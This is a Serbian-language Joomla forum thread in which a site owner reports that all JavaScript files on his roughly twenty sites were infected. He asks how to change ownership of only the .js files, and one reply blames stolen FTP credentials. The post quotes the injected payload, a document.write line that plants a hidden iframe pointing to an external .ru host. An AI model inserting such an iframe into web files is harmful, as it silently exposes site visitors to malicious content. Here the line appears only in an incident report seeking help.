iframe u svim .js fajlovima

Moderators: cicans, TheHacker

Locked
morob
Joomla! Apprentice
Joomla! Apprentice
Posts: 8
Joined: Mon Jan 19, 2009 4:32 pm

iframe u svim .js fajlovima

Post by morob » Wed Nov 07, 2012 3:15 pm

Pozdrav,

imam VPS sa oko 20 Joomla sajtova, svi su 1.5.26. Od pre dva dana su svi sajtovi zarazeni. Generalno, svi .js fajlovi imaju iframe na kraju. Link koji sadrzi iframe se menja otprilike na svakih sat vremena. Preko shell-a sam izlistao sve fajlove koji su modifikovani u poslednja dva dana, medjutim nikako da nadjem neki .php ili .html ili bilo sta drugo sto bi bilo cudno, osim .js fajlova. Odradio sam restore jednog od sajtova i posle dva minuta, bio je ponovo zarazen. Koristio sam JCE, medjutim deinstalirao sam ga, posto se nalazi na vulnerability listi, jelte. U sustini sajtovi nemaju vise nisto drugo zajednicko, tj. neku ekstenziju koju svi koriste.

ubaceni iframe izgleda ovako:

document.write('<iframe src="http://nekiruskisajt.ru/imefajla.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>');

Imate li mozda neku ideju? Hvala unapred.

A ima li mozda neko iskustva Shell-u? :-[ Za prvu pomoc hteo bih da za sve .js fajlove promenim owner i group na nesto:nesto sa apache:apache da ih malware ne moze vise editovati, cisto dok ne nadjem uzrok.

chown -hR owner:group /folder - komanda bi promenila sve u /folder i nize ukljucujuci fajlove i ostale foldere, a meni treba da menja samo *.js fajlove

Kada stavim chown -hR owner:group /folder/*.js, on promeni fajlove koje su u tom folderu, ali tu se potom i zaustavi i ne ide nize.

 
User avatar
Ves Masina
Joomla! Intern
Joomla! Intern
Posts: 72
Joined: Wed Feb 10, 2010 9:11 am
Contact:

Re: iframe u svim .js fajlovima

Post by Ves Masina » Thu Nov 08, 2012 11:52 pm

Koliko sam upoznat, najveca verovatnoca za ovaj javascript iframe hack je preko FTP-a. Probaj da promenis root password kao i password-e svih FTP naloga. Javi ishod pa ako nije da idemo dalje sa dijagnostikom.

 

Locked

Return to “Bezbednost”